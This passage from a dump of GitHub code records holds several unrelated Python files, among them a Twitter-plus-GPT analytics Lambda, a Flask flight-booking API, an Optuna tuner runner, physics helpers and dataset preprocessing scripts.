ds_texto:\n self.arrPilha.append(ds_char)\n if ds_char == \"]\":\n self.processaFechamento()\n return self.imprimirPilha()\n \n def processaFechamento(self):\n # remove fechamento\n self.arrPilha.pop()\n\n ds_texto_final = \"\"\n ds_char = self.arrPilha.pop()\n while (ds_char != \"[\"):\n ds_texto_final = ds_char + ds_texto_final\n ds_char = self.arrPilha.pop()\n\n nr_repetidor = int(self.arrPilha.pop())\n ds_texto_final = ds_texto_final * nr_repetidor\n\n self.arrPilha.append(ds_texto_final)\n \n def imprimirPilha(self):\n ds_texto = \"\"\n while self.arrPilha:\n ds_texto = self.arrPilha.pop() + ds_texto\n return ds_texto\n\nfor ds_texto in arrStrings:\n objDecodifica = Decodifica()\n print(objDecodifica.decodificar(ds_texto)) \n","repo_name":"adrwtr/algomania","sub_path":"decode-string.py","file_name":"decode-string.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13702130213","text":"from twython import Twython\nimport os\nimport openai\nfrom dateutil import parser\nfrom datetime import datetime\nimport logging\nimport json\nimport pytz\nfrom typing import Optional\nimport re\nimport boto3\nimport pandas as pd\nimport psycopg2\nimport psycopg2.extras\nfrom botocore.exceptions import ClientError\n\nopenai.api_key = os.environ['OPENAI_API_KEY']\n\ndef get_db_connection() -> psycopg2.extensions.connection:\n # to connect to DB, use the parameters and password that define it\n conn = psycopg2.connect(\n user=\"postgres\",\n password=os.environ['DB_PASSWORD'], #password\n host=os.environ['DB_HOST'], #twitter.cblavhksmkyd.eu-central-1.rds.amazonaws.com\n port=\"5432\",\n connect_timeout=1)\n return conn\n\ndef _time_parser(twitter_time: str) -> datetime:\n '''\n Parse string from twitter api like 'Sat Sep 02 14:25:02 +0000 2021'\n to a datetime object in utc time\n '''\n return parser.parse(twitter_time)\n\n\ndef is_recent(tweet: dict,\n max_time_interval_minutes: int = 20) -> bool:\n '''\n a tweet is recent if it is posted in the last x minutes'\n '''\n time_created = _time_parser(tweet['created_at'])\n now = datetime.now(tz=pytz.UTC)\n # converts time to minutes as the function takes minutes as argument\n seconds_diff = (now-time_created).seconds\n minutes_diff = seconds_diff/60\n is_recent_tweet = minutes_diff <= max_time_interval_minutes\n return is_recent_tweet\n\n\ndef extract_fields(tweet: dict) -> dict:\n '''\n Arbitrary decision to save only some fields of the tweet,\n store them in a different dictionary form which\n is convenient for saving them later\n '''\n author = tweet['user']['screen_name']\n time_created = _time_parser(tweet['created_at'])\n text = tweet['text']\n return dict(author=author,timestamp=time_created, text=text)\n\n\ndef upload_file_to_s3(local_file_name: str,\n bucket: str,\n s3_object_name: Optional[str]=None):\n \"\"\"Upload a file to an S3 bucket\n\n :param file_name: File to upload\n :param bucket: Bucket to upload to\n :param s3_object_name: If not specified then file_name is used\n :return: True if file was uploaded, else False\n \"\"\"\n\n # If S3 object_name was not specified, use file_name\n if s3_object_name is None:\n s3_object_name = local_file_name\n\n # Upload the file\n s3_client = boto3.client(\n 's3',\n aws_access_key_id=os.environ['IAM_AWS_ACCESS_KEY'],\n aws_secret_access_key=os.environ['IAM_AWS_SECRET_ACCESS_KEY'],\n )\n try:\n s3_client.upload_file(local_file_name, bucket, s3_object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n\ndef convert_timestamp_to_int(tweet: dict) ->dict:\n '''datetime object are not serializable for json,\n so we need to convert them to unix timestamp'''\n tweet = tweet.copy()\n tweet['timestamp'] = tweet['timestamp'].timestamp()\n return tweet\n\n\ndef insert_data_in_db(df: pd.DataFrame,\n conn: psycopg2.extensions.connection,\n table_name: str = 'tweets_analytics') -> None:\n # you need data and a valid connection to insert data in DB\n are_data = len(df) > 0\n if are_data and conn is not None:\n try:\n cur = conn.cursor()\n # For a batch insert we need to reshape the data \n # in 2 strings with the column names and their values\n df_columns = list(df.columns)\n columns = \",\".join(df_columns)\n\n # create VALUES('%s', '%s\",...) one '%s' per column\n values = \"VALUES({})\".format(\",\".join([\"%s\" for _ in df_columns]))\n\n # create INSERT INTO table (columns) VALUES('%s',...)\n # here the final 2 strings are created\n insert_string = \"INSERT INTO {} ({}) {}\"\n insert_stmt = insert_string.format(table_name, columns, values)\n psycopg2.extras.execute_batch(cur, insert_stmt, df.values)\n conn.commit()\n print('succesful update')\n\n except psycopg2.errors.InFailedSqlTransaction:\n # if the transaction fails, rollback to avoid DB lock problems\n logging.exception('FAILED transaction')\n cur.execute(\"ROLLBACK\")\n conn.commit()\n\n except Exception as e:\n # if the transaction fails, rollback to avoid DB lock problems\n logging.exception(f'FAILED {str(e)}')\n cur.execute(\"ROLLBACK\")\n conn.commit()\n finally:\n # close the DB connection after this\n cur.close()\n conn.close()\n elif conn is None:\n raise ValueError('Connection to DB must be alive!')\n elif len(df) == 0:\n raise ValueError('df has 0 rows!')\n\ndef ask_gpt(context, question, tweet, MODEL):\n response = openai.ChatCompletion.create(\n model=MODEL,\n messages=[\n {\"role\": \"system\", \"content\": f\"{context}\"},\n {\"role\": \"user\", \"content\": f'{question}\\n\\Tweet:\\n\"\"\"\\n{tweet}'},\n ],\n temperature=0.5,\n )\n return response\n\n\ndef lambda_handler(event, context):\n try:\n python_tweets = Twython(os.environ['TWITTER_API_KEY'],\n os.environ['TWITTER_API_SECRET'])\n persons = ['LavinJoaquin', 'gabrielboric', 'rodolfocarter', 'joseantoniokast', 'AXELKAISER', 'PamJiles'\n 'Orrego', 'carreragonzalo', 'Diego_Schalper' ,'GiorgioJackson', 'izkia'\n , 'Carolina_Toha', 'guidogirardi', 'Jou_Kaiser', 'MaiteOrsini', 'GmoRamirez', 'gonzalowinter']\n clean_timeline = []\n for p in persons:\n query = {'screen_name': p}\n tweets = python_tweets.get_user_timeline(**query)\n recent_tweets = [tweet for tweet in tweets\n if is_recent(tweet)] \n for tweet in recent_tweets:\n # Ignorar los retweets\n if 'retweeted_status' not in tweet:\n # Ignorar los tweets con enlaces\n if 'http' in tweet['text']:\n tweet['text'] = re.sub(r\"http\\S+\", \"\", tweet['text'])\n else:\n continue\n clean_timeline.append(tweet)\n \n clean_timeline = [extract_fields(tweet) for tweet in clean_timeline]\n context_gpt = {}\n question = {}\n question['summary'] = 'Me puedes decir cual es el tema central del siguiente tweet? responde en no mas de 3 palabras'\n question['intention'] = 'Crees que el siguiente tweet tiene una intención constructiva, destructiva o neutral? Tu respuesta debe ser una sola palabra'\n context_gpt['summary'] = 'Imagina que eres un experto en descubrir palabras clave y resumiendo contenido'\n context_gpt['intention'] = 'Imagina que eres un experto en politica y opinologia'\n \n MODEL = \"gpt-3.5-turbo\"\n columns = ['summary', 'intention']\n \n for tw in range(len(clean_timeline)):\n for col in columns:\n response = ask_gpt(context_gpt[col], question[col], clean_timeline[tw]['text'], MODEL)\n clean_timeline[tw][f'gpt_{col}'] = response['choices'][0]['message']['content']\n now_str = datetime.now(tz=pytz.UTC).strftime('%d-%m-%Y-%H:%M:%S')\n filename = f'{now_str}.json'\n output_path_file = f'/tmp/{filename}'\n # in lambda files need to be dumped into /tmp folder\n with open(output_path_file, 'w') as fout:\n tweets_to_save = [convert_timestamp_to_int(tweet)\n for tweet in clean_timeline]\n json.dump(tweets_to_save , fout)\n upload_file_to_s3(local_file_name=output_path_file,\n bucket=os.environ['TWITTER_BUCKET'],\n s3_object_name=f'raw-messages/{filename}')\n \n tweets_df = pd.DataFrame(clean_timeline)\n conn = get_db_connection()\n insert_data_in_db(df=tweets_df, conn=conn, table_name='tweets_analytics')\n except Exception as e:\n logging.exception('Exception occured \\n') \n print('Lambda executed succesfully!')\n\nif __name__ == \"__main__\":\n lambda_handler({}, {})","repo_name":"jtlavin/twitter-gpt","sub_path":"tweet_gpt_analytics/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":8288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"26451751045","text":"import argparse\nimport time\n\nimport optuna\n\nfrom batbench.manager.manager import Manager\nfrom batbench.result.result import Result\n\nclass Optuna:\n\n def objective(self, trial):\n tuning_config = self.get_next_tuning_config(trial)\n self.result.config = tuning_config\n\n self.result.algorithm_time = time.time() - self.t0\n prev_result = self.manager.run(tuning_config, self.result)\n self.result = Result()\n return prev_result.objective\n\n def get_next_tuning_config(self, trial):\n tuning_config = {}\n for (name, values) in self.manager.config_space.get_parameters_pair():\n tuning_config[name] = trial.suggest_categorical(name, values)\n\n return tuning_config\n\n def main(self, args):\n self.manager = Manager(args)\n n_trials = self.manager.budget_trials\n #if self.manager.problem.spec[\"General\"][\"LoggingLevel\"] != \"Debug\":\n optuna.logging.set_verbosity(optuna.logging.WARNING)\n\n search_space = {}\n for (name, values) in self.manager.config_space.get_parameters_pair():\n search_space[name] = values\n\n study = optuna.create_study(sampler=optuna.samplers.GridSampler(search_space))\n self.t0 = time.time()\n self.result = Result()\n study.optimize(self.objective, n_trials=n_trials)\n self.manager.dataset.final_write_data()\n best = self.manager.dataset.get_best()\n self.manager.finished()\n return best\n\n\ndef main():\n\n optunaparser = argparse.ArgumentParser()\n optunaparser.add_argument('--json', type=str, default=\"./benchmarks/MD5Hash-CAFF.json\",\n help='location of T1 json file')\n optunaparser.add_argument('--testing', type=str, default=False,\n help='If the execution is a test or not')\n\n args = optunaparser.parse_args()\n\n\n optuna_runner = Optuna()\n\n\n if not args.verbose:\n optuna.logging.set_verbosity(optuna.logging.WARNING)\n\n print(optuna_runner.main(args))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NTNU-HPC-Lab/BAT","sub_path":"batbench/tuners/optuna_runner/optuna_runner.py","file_name":"optuna_runner.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"14604555413","text":"from keras import backend as K\n\ndef set_trainable(model, train):\n \"\"\"\n Enable or disable training for the model\n args:\n model(?):\n train(?):\n \"\"\"\n model.trainable = train\n for l in model.layers:\n l.trainable = train\n\n\ndef zero_loss(y_true, y_pred):\n \"\"\"\n args:\n y_true():\n y_pred():\n \"\"\"\n return K.zeros_like(y_true)\n\ndef sample_normal(args):\n \"\"\"\n\n \"\"\"\n z_avg, z_log_var = args\n batch_size = K.shape(z_avg)[0]\n z_dims = K.shape(z_avg)[1]\n eps = K.random_normal(shape=(batch_size, z_dims), mean=0.0, stddev=1.0)\n return z_avg + K.exp(z_log_var / 2.0) * eps\n\ndef time_format(t):\n m, s = divmod(t, 60)\n m = int(m)\n s = int(s)\n if m == 0:\n return \"%d sec\" %s\n else:\n return \"%d min %d sex\" %(m, s)\n\n","repo_name":"tkazusa/CVAE-GAN","sub_path":"models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"76"} +{"seq_id":"7931060837","text":"import numpy as np\n#import matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\n\n\n#atmc = atm.Atmosphere(model=1)\naverage_density = 6.5e-4 #in g/cm^3#atmc.get_density(average_zenith, average_xmax) * 1e-3 # in kg/m^3\nmag=2.03\n\n\nrho_avg=0.72 # average density, 0.72 kg/m3\n# charge excess parameters\np0a=0.2\np1a=1.27\np2a=-0.08\n\n# slant depth parameters proton\np0s_p=1.02\np1s_p=-0.49\np2s_p=0\n\n# slant depth parameters iron\np0s_fe=0.98\np1s_fe=-0.47\np2s_fe=0\n\n\ndef integral(fluence,pos):\n\n pos_uvw_vxb=pos[0::8]\n pos_uvw_vxvxb=pos[2::8]\n neg_uvw_vxb=pos[4::8]\n neg_uvw_vxvxb=pos[6::8]\n \n fluence_pos_vxb=fluence[0::8]\n fluence_pos_vxvxb=fluence[2::8]\n fluence_neg_vxb=fluence[4::8]\n fluence_neg_vxvxb=fluence[6::8]\n \n \n \n pos_vxvxb_all=np.concatenate([neg_uvw_vxvxb.T[1],pos_uvw_vxvxb.T[1]])\n fluence_vxvxb=np.concatenate([fluence_pos_vxvxb,fluence_neg_vxvxb])\n inds = pos_vxvxb_all.argsort()\n \n sorted_pos=pos_vxvxb_all[inds]\n sorted_fluence_vxvxb=fluence_vxvxb[inds]\n f0 = interp1d(sorted_pos, sorted_fluence_vxvxb, kind='cubic')\n r= np.linspace(0, 500, num=1000, endpoint=True)\n \n \n # integrate positive vxvxB arm\n n=len(r)\n dr=r[1]-r[0]\n integral=0\n \n for i in np.arange(n-1):\n r0=r[i]\n r1=r[i+1]\n val0=r0*(f0(r0))\n val1=r1*(f0(r1))\n integral=integral+(val0+val1)*0.5*dr\n\n integral=integral*2*np.pi\n\n\n return integral\n\n\ndef StoEm(S,A=1.683,B=2.006):\n \n Em=np.power((S/(A*1e7)),1/B)*1e18\n\n return Em\n\n\n\ndef return_Srd(Erad,zenith,density,alpha,type):\n a=return_a(density*1e3*np.cos(zenith),rho_avg,p0a,p1a,p2a)/mag**0.9\n Srd=Erad/np.sin(alpha)**2/mag**1.8\n Srd_1=Erad/(a**2+(1-a**2)*np.sin(alpha)**2)/mag**1.8\n if type==0:\n Srd_2=Erad/(a**2+(1-a**2)*np.sin(alpha)**2)/(1-p0s_p+p0s_p*np.exp(p1s_p*(density*1e3*np.cos(zenith)-rho_avg)))**2/mag**1.8\n else:\n Srd_2=Erad/(a**2+(1-a**2)*np.sin(alpha)**2)/(1-p0s_fe+p0s_fe*np.exp(p1s_fe*(density*1e3*np.cos(zenith)-rho_avg)))**2/mag**1.8\n\n return Srd_2\n\n\ndef return_a(rho,avg,p0,p1,p2):\n a= p2+p0*np.exp(p1*(rho-avg))\n return a\n\n\n\ndef integrate(r,flu0,flu1):\n n=len(r)\n dr=r[1]-r[0]\n integral=0\n for i in np.arange(n-1):\n r0=r[i]\n r1=r[i+1]\n val0=r0*(flu0[i]+flu1[i])\n val1=r1*(flu0[i+1]+flu1[i+1])\n integral=integral+(val0+val1)*0.5*dr\n \n \n \n return 2*np.pi*integral#*6.2415e18 # to eV\n\ndef integrate_one_pol(r,flu):\n n=len(r)\n dr=r[1]-r[0]\n integral=0\n for i in np.arange(n-1):\n r0=r[i]\n r1=r[i+1]\n val0=r0*(flu[i])\n val1=r1*(flu[i+1])\n integral=integral+(val0+val1)*0.5*dr\n \n \n \n return 2*np.pi*integral#*6.2415e18 # to eV\n\n\ndef get_clipping(dxmax):\n \"\"\" get clipping correction\n \n Parameters\n ----------\n dxmax : float\n distance to shower maximum in g/cm^2\n \n Returns\n -------\n float\n fraction of radiation energy that is radiated in the atmosphere\n \n \"\"\"\n return 1 - np.exp(-8.7 * (dxmax * 1e-3 + 0.29) ** 1.89)\n","repo_name":"kmulrey/spectral_analysis","sub_path":"radiation_energy.py","file_name":"radiation_energy.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29640038722","text":"#######################################################################################\n# 我们就获得了Month类型的枚举类,可以直接使用Month.Jan来引用一个常量,或者枚举它的所有成员:\n# value属性则是自动赋给成员的int常量,默认从1开始计数。\nfrom enum import Enum\nMonth = Enum('Month', ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\n\nfor name, member in Month.__members__.items():\n print(name, '=>', member, ',', member.value)\n\n# 如果需要更精确地控制枚举类型,可以从Enum派生出自定义类\nfrom enum import Enum, unique\n\n@unique\nclass Weekday(Enum):\n Sun = 0 # Sun的value被设定为0\n Mon = 1\n Tue = 2\n Wed = 3\n Thu = 4\n Fri = 5\n Sat = 6\n# 既可以用成员名称引用枚举常量,又可以直接根据value的值获得枚举常量\nprint(Weekday.Tue)\nprint(Weekday['Tue'])\nprint(Weekday.Tue.value)\nprint(Weekday(1))\nfor name, member in Weekday.__members__.items():\n print(name, '=>', member)\n\nfor value in Weekday.__members__.items():\n print(value)\n\nfor value in Weekday.__members__.values():\n print(value)\n\nfor value in Weekday.__members__.values():\n print(value.value)","repo_name":"quaner2557/ML_python","sub_path":"pythontry/ENUM.py","file_name":"ENUM.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26948109991","text":"import random \nimport time\nfrom tkinter import Tk, Canvas, HIDDEN, NORMAL\n\n\nroot = Tk()\nroot.title('Snap')\nc = Canvas(root, width=400, height=400)\n\n\nshapes = []\n\n\ncircle = c.create_oval (35, 20, 365, 350, outline='black', fill='black', state=HIDDEN)\nshapes.append(circle)\ncircle = c.create_oval (35, 20, 365, 350, outline='red', fill='red', state=HIDDEN)\nshapes.append(circle)\ncircle = c.create_oval (35, 20, 365, 350, outline='green', fill='green', state=HIDDEN)\nshapes.append(circle)\ncircle = c.create_oval (35, 20, 365, 350, outline='blue', fill='blue', state=HIDDEN)\nshapes.append(circle)\n\n\nrectangle = c.create_rectangle(35, 100, 365, 270, outline='black')\nc.pack()","repo_name":"benjaminner/python-scripts","sub_path":"Book/snap.py","file_name":"snap.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"17305683872","text":"from utils import (\n highrisk_midrisk_lowrisk_splitter,\n make_empty_dataframe,\n make_age_column,\n make_monthly_income,\n make_marital_status,\n make_gender,\n make_no_of_dependents,\n)\nimport pandas as pd\n\n\ndef make_highrisk_dataframe(no_of_high_risk_datapoints):\n highrisk_df = make_empty_dataframe()\n\n age_distribution = {\"18-30\": 70, \"30-50\": 20, \"50-80\": 10}\n highrisk_df[\"age\"] = make_age_column(no_of_high_risk_datapoints, age_distribution)\n\n income_distribution = {\"40-60\": 5, \"60-80\": 5, \"80-100\": 60, \"100-200\": 30}\n highrisk_df[\"monthly_income\"] = make_monthly_income(\n no_of_high_risk_datapoints, income_distribution\n )\n\n marital_status_distribution = {\"married\": 30, \"unmarried\": 70}\n highrisk_df[\"marital_status\"] = make_marital_status(\n no_of_high_risk_datapoints, marital_status_distribution\n )\n\n gender_distribution = {\"male\": 70, \"female\": 30}\n highrisk_df[\"sex\"] = make_gender(no_of_high_risk_datapoints, gender_distribution)\n\n no_of_dependents_distribution = {0: 30, 1: 30, 2: 20, 3: 10, 4: 5, 5: 5}\n highrisk_df[\"no_of_dependents\"] = make_no_of_dependents(\n no_of_high_risk_datapoints, no_of_dependents_distribution\n )\n highrisk_df[\"risk\"] = [2] * no_of_high_risk_datapoints\n highrisk_df.to_csv(\"data/highrisk_dataset.csv\")\n\n return highrisk_df\n\n\ndef make_midrisk_dataframe(no_of_mid_risk_datapoints):\n midrisk_df = make_empty_dataframe()\n\n age_distribution = {\"18-30\": 40, \"30-50\": 35, \"50-80\": 25}\n midrisk_df[\"age\"] = make_age_column(no_of_mid_risk_datapoints, age_distribution)\n\n income_distribution = {\"10-20\": 5, \"20-40\": 25, \"40-60\": 70}\n midrisk_df[\"monthly_income\"] = make_monthly_income(\n no_of_mid_risk_datapoints, income_distribution\n )\n\n marital_status_distribution = {\"married\": 50, \"unmarried\": 50}\n midrisk_df[\"marital_status\"] = make_marital_status(\n no_of_mid_risk_datapoints, marital_status_distribution\n )\n\n gender_distribution = {\"male\": 50, \"female\": 50}\n midrisk_df[\"sex\"] = make_gender(no_of_mid_risk_datapoints, gender_distribution)\n\n no_of_dependents_distribution = {0: 5, 1: 20, 2: 30, 3: 30, 4: 10, 5: 5}\n midrisk_df[\"no_of_dependents\"] = make_no_of_dependents(\n no_of_mid_risk_datapoints, no_of_dependents_distribution\n )\n midrisk_df[\"risk\"] = [1] * no_of_mid_risk_datapoints\n midrisk_df.to_csv(\"data/midrisk_dataset.csv\")\n\n return midrisk_df\n\n\ndef make_lowrisk_dataframe(no_of_low_risk_datapoints):\n lowrisk_df = make_empty_dataframe()\n\n age_distribution = {\"18-30\": 10, \"30-50\": 20, \"50-80\": 70}\n lowrisk_df[\"age\"] = make_age_column(no_of_low_risk_datapoints, age_distribution)\n\n income_distribution = {\"10-20\": 10, \"20-40\": 20, \"40-60\": 70}\n lowrisk_df[\"monthly_income\"] = make_monthly_income(\n no_of_low_risk_datapoints, income_distribution\n )\n\n marital_status_distribution = {\"married\": 50, \"unmarried\": 50}\n lowrisk_df[\"marital_status\"] = make_marital_status(\n no_of_low_risk_datapoints, marital_status_distribution\n )\n\n gender_distribution = {\"male\": 50, \"female\": 50}\n lowrisk_df[\"sex\"] = make_gender(no_of_low_risk_datapoints, gender_distribution)\n\n no_of_dependents_distribution = {0: 5, 1: 5, 2: 10, 3: 20, 4: 30, 5: 30}\n lowrisk_df[\"no_of_dependents\"] = make_no_of_dependents(\n no_of_low_risk_datapoints, no_of_dependents_distribution\n )\n lowrisk_df[\"risk\"] = [0] * no_of_low_risk_datapoints\n lowrisk_df.to_csv(\"data/lowrisk_dataset.csv\")\n\n return lowrisk_df\n\n\ndef main():\n total_data_points = int(input(\"Enter total number of data points you need : \"))\n (\n no_of_highrisk_data_points,\n no_of_midrisk_data_points,\n no_of_low_risk_data_points,\n ) = highrisk_midrisk_lowrisk_splitter(total_data_points)\n make_highrisk_dataframe(no_of_highrisk_data_points)\n make_midrisk_dataframe(no_of_midrisk_data_points)\n make_lowrisk_dataframe(no_of_low_risk_data_points)\n df1 = pd.read_csv(\"data/highrisk_dataset.csv\")\n df2 = pd.read_csv(\"data/midrisk_dataset.csv\")\n df3 = pd.read_csv(\"data/lowrisk_dataset.csv\")\n df = pd.concat([df1, df2, df3])\n df.to_csv(\"data/dataset.csv\", index=False)\n\n\nmain()\n","repo_name":"JigarJoshi04/RiskAppetitePredictor-StockMarket","sub_path":"data_synthesizer/data_creator.py","file_name":"data_creator.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42164603258","text":"from flask import Blueprint, request, jsonify, make_response, session\nimport os\nfrom App.common.ResData import ResData\nfrom App.ext import db\nfrom App.models import User, Flight, UserBuyRecord\n\nflightBlue = Blueprint(\"flight\", __name__)\n\n\ndef init_flightBlue(app):\n app.register_blueprint(blueprint=flightBlue)\n\n\n@flightBlue.route(\"/flight/createTable\", methods=[\"POST\", \"GET\"])\ndef createTable():\n db.drop_all()\n db.create_all()\n return \"sec\"\n\n\n@flightBlue.route(\"/flight/queryAll\", methods=[\"POST\", \"GET\"])\ndef queryAll():\n flights = Flight.query.filter().all()\n flightList = []\n for one in flights:\n flightList.append(one.to_json())\n flightsJson = {\"flights\": flightList}\n res = make_response(ResData.success(flightsJson))\n return res\n\n\n@flightBlue.route(\"/flight/search\", methods=[\"POST\"])\ndef search():\n startingPlace = request.form.get('startingPlace')\n endPlace = request.form.get('endPlace')\n startTime = request.form.get('startTime')\n flights = Flight.query.filter(Flight.startingPlace == startingPlace,\n Flight.endPlace == endPlace, Flight.startTime == startTime).all()\n flightList = []\n for one in flights:\n flightList.append(one.to_json())\n flightsJson = {\"flights\": flightList}\n res = make_response(ResData.success(flightsJson))\n return res\n\n\n@flightBlue.route(\"/flight/update\", methods=[\"POST\"])\ndef update():\n flightId = request.form.get(\"flightId\")\n if(flightId is None):\n return ResData.paramEmpty(flightId)\n flight = Flight.query.filter(Flight.flightId == flightId).first()\n\n startingPlace = request.form.get('startingPlace')\n endPlace = request.form.get('endPlace')\n startTime = request.form.get('startTime')\n endTime = request.form.get('endTime')\n flightNumber = request.form.get('flightNumber')\n price = request.form.get('price')\n flightName = request.form.get('flightName')\n number = request.form.get('number')\n\n flight.startingPlace = startingPlace\n flight.endPlace = endPlace\n flight.startTime = startTime\n flight.endTime = endTime\n flight.flightNumber = flightNumber\n flight.price = price\n flight.flightName = flightName\n flight.number = number\n\n db.session.add(flight)\n db.session.commit()\n return ResData.success(None)\n\n\n@flightBlue.route(\"/flight/insert\", methods=[\"POST\"])\ndef insert():\n startingPlace = request.form.get('startingPlace')\n endPlace = request.form.get('endPlace')\n startTime = request.form.get('startTime')\n endTime = request.form.get('endTime')\n flightNumber = request.form.get('flightNumber')\n price = request.form.get('price')\n flightName = request.form.get('flightName')\n number = request.form.get('number')\n flight = Flight()\n flight.startingPlace = startingPlace\n flight.endPlace = endPlace\n flight.startTime = startTime\n flight.endTime = endTime\n flight.flightNumber = flightNumber\n flight.price = price\n flight.flightName = flightName\n flight.number = number\n db.session.add(flight)\n db.session.commit()\n return ResData.success(None)\n\n\n@flightBlue.route(\"/flight/delete\", methods=[\"POST\"])\ndef delete():\n flightId = request.form.get('flightId')\n if(flightId is None):\n return ResData.paramEmpty(flightId)\n flight = Flight.query.filter(Flight.flightId == flightId).first()\n db.session.delete(flight)\n db.session.commit()\n return ResData.success(None)\n\n\n@flightBlue.route(\"/flight/buy\", methods=[\"POST\"])\ndef buy():\n flightId = request.form.get('flightId')\n userName = request.cookies.get('username')\n if(userName is None):\n return ResData.needLogin(flightId)\n if(flightId is None):\n return ResData.paramEmpty(flightId)\n flight = Flight.query.filter(Flight.flightId == flightId).first()\n flight.number = flight.number - 1\n\n userBuyRecord = UserBuyRecord()\n userBuyRecord.productId = flightId\n userBuyRecord.productType = \"flight\"\n userBuyRecord.userName = userName\n\n db.session.add(flight)\n db.session.add(userBuyRecord)\n db.session.commit()\n return ResData.success(None)\n\n@flightBlue.route(\"/flight/initSql\", methods=[\"POST\"])\ndef initSql():\n PATH = lambda p: os.path.abspath(os.path.join(os.path.dirname(__file__), p))\n p=os.path.realpath(__file__)\n cur_path = os.path.dirname(os.path.realpath(__file__))\n print(cur_path)\n path=cur_path +'\\sql\\init.sql'\n f = open(path,\"r\",encoding='UTF-8')\n txt=f.read()\n sql =\"INSERT INTO `post_record` (`postBy`, `postContent`, `postTitle`, `postTime`, `postPic`) VALUES ('admin', '官方网址:http://yuilibrary.com/YUI Editor 是雅虎的 YUI 包中的一个可视化HTML编辑器组件。', '土耳其三日游', '2019-05-12 14:45:01', NULL);\"\n data_query = db.session.execute(sql)\n db.session.commit()\n return ResData.success(None)","repo_name":"BaobaoAndDabao/tour","sub_path":"App/FlightApi.py","file_name":"FlightApi.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"8643534240","text":"# Importing dependencies\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport os\nfrom sklearn.model_selection import train_test_split\n\n# Loading dataset\nmeta = pd.read_csv('meta.csv')\n\n# Dropping gender column\nmeta = meta.drop(['gender'], axis=1)\n\n# Filtaring dataset\nmeta = meta[meta['age'] >= 0]\nmeta = meta[meta['age'] <= 101]\n\n# Converting into numpy array\nmeta = meta.values\n\n# Spliting dataset into training and testing set\nD_train, D_test = train_test_split(meta, test_size=0.2, random_state=42)\n\n# Making the directory structure\nfor i in range(102):\n output_dir_train_male = 'dataset/age/train/' + str(i)\n output_dir_train_female = 'dataset/age/train/' + str(i)\n\n if not os.path.exists(output_dir_train_male):\n os.makedirs(output_dir_train_male)\n\n if not os.path.exists(output_dir_train_female):\n os.makedirs(output_dir_train_female)\n\n output_dir_test_male = 'dataset/age/test/' + str(i)\n output_dir_test_female = 'dataset/age/test/' + str(i)\n\n if not os.path.exists(output_dir_test_male):\n os.makedirs(output_dir_test_male)\n\n if not os.path.exists(output_dir_test_female):\n os.makedirs(output_dir_test_female)\n\n# Finally making the training and testing set\ncounter = 0\n\nfor image in D_train:\n img = cv2.imread(image[1], 1)\n img = cv2.resize(img, (128,128))\n cv2.imwrite('dataset/age/train/' + str(image[0]) + '/' + str(counter) + '.jpg', img)\n print('--('+str(counter)+')Processing--')\n counter += 1\n\ncounter = 0\n\nfor image in D_test:\n img = cv2.imread(image[1], 1)\n img = cv2.resize(img, (128,128))\n cv2.imwrite('dataset/age/test/' + str(image[0]) + '/' + str(counter) + '.jpg', img)\n print('--('+str(counter)+')Processing--')\n counter += 1\n\n\n","repo_name":"imdeepmind/processed-imdb-wiki-dataset","sub_path":"age.py","file_name":"age.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"76"} +{"seq_id":"11572029573","text":"import os\nimport sys\nimport subprocess\nimport types\nfrom multiprocessing import Pool\n\n\ndef apply(pool, args, kwargs):\n #pool.apply_async(call, args, kwargs)\n call(*args, **kwargs)\n\n\ndef call(*args, **_kwargs):\n kwargs=dict(stype=\"VEC\", qtype=-1, parameterless=None)\n kwargs.update(_kwargs)\n\n cmdargs = [\"mono-sgen\", \"--debug\", \"ExactIndexes.exe\"]\n for arg in args:\n cmdargs.append(arg)\n\n for k, v in kwargs.items():\n cmdargs.append(\"--\" + k)\n if v is None:\n pass\n elif isinstance(v, types.TupleType) or isinstance(v, types.ListType):\n cmdargs.append(\",\".join(map(str, v)))\n else:\n cmdargs.append(str(v))\n\n subprocess.call(cmdargs)\n\n\nBASE_ARGS = dict(\n parameterless=None,\n laesa=[4,8,16,32,64],\n spa=[4,8,16,32,64],\n sss=[0.4],\n bnc=[4,8,16,32,64],\n kvp=[4,8,16,32],\n milc=[4,8,16,32,64],\n ept=[4,8,16,32,64],\n lc=[1024,512,256,128,64]\n )\n\n\ndef main_real(pool):\n ### real datasets\n args = dict(BASE_ARGS.items())\n args[\"lc\"] = [1024,512,256,128,64]\n\n D=\"dbs/strings/dictionaries/English.dic\"\n Q=\"queries/dic-english.queries\"\n apply(pool, (), dict(database=D, queries=Q, stype=\"STR-ED\", **args))\n \n D=\"dbs/strings/wiktionary/english.tsv\"\n Q=\"queries/wiktionary-english.queries\"\n apply(pool, (), dict(database=D, queries=Q, stype=\"WIKTIONARY\", **args))\n\n D=\"dbs/cophir/cophir1M\"\n 